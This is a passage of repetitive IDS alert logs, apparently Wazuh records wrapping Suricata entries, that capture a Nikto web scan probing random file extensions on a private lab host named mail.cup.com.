character","id":"86601","firedtimes":21,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.36817","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.393834+0000\",\"flow_id\":1990996498513606,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46978,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.bin\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.393834+0000","flow_id":"1990996498513606.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46978","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.bin","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.396042+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":22,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.38355","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.396042+0000\",\"flow_id\":1431362259781643,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46980,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dat\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.396042+0000","flow_id":"1431362259781643.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46980","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dat","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.399022+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":23,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.39893","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.399022+0000\",\"flow_id\":2013892969108308,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46982,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dbm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.399022+0000","flow_id":"2013892969108308.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46982","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dbm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.401306+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":24,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.41431","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.401306+0000\",\"flow_id\":1806467523550245,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46984,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.html\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.401306+0000","flow_id":"1806467523550245.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46984","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.html","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.403790+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":25,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.42971","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.403790+0000\",\"flow_id\":1045261879748187,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46986,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.thtml\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.403790+0000","flow_id":"1045261879748187.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46986","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.thtml","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.406521+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":26,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.44513","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.406521+0000\",\"flow_id\":2137592322207186,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46988,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.AP\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.406521+0000","flow_id":"2137592322207186.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46988","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.AP","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.408739+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":27,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.46049","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.408739+0000\",\"flow_id\":491335652620395,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46990,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cp-1251\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.408739+0000","flow_id":"491335652620395.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46990","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cp-1251","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.411490+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":28,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.47593","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.411490+0000\",\"flow_id\":418346978395032,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46992,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.blt\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.411490+0000","flow_id":"418346978395032.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46992","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.blt","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.414228+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":29,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.49129","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.414228+0000\",\"flow_id\":984986308726290,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46994,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/.bISn4adA\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.414228+0000","flow_id":"984986308726290.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46994","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/.bISn4adA","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.416379+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":30,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.50659","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.416379+0000\",\"flow_id\":1450801281783779,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46996,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.show_query_columns\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.416379+0000","flow_id":"1450801281783779.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46996","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.show_query_columns","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.418630+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":31,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.52227","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.418630+0000\",\"flow_id\":391417533456539,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46998,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dtd\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.418630+0000","flow_id":"391417533456539.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46998","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dtd","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.429055+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":32,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.53763","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.429055+0000\",\"flow_id\":1722213150132363,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47002,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.htm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.429055+0000","flow_id":"1722213150132363.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47002","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.htm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.420714+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":33,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.55301","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.420714+0000\",\"flow_id\":1.80732651702906e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47000,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.shtm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.420714+0000","flow_id":"1807326517029060.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47000","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.shtm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.434021+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":34,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.56845","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.434021+0000\",\"flow_id\":243292701366920,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47004,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.it\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.434021+0000","flow_id":"243292701366920.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47004","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.it","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.439682+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":35,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.58379","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.439682+0000\",\"flow_id\":1495318617829748,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47006,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.INC\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.439682+0000","flow_id":"1495318617829748.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47006","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.INC","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.445037+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":36,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.59917","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.445037+0000\",\"flow_id\":429677102155680,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47008,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.jsp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
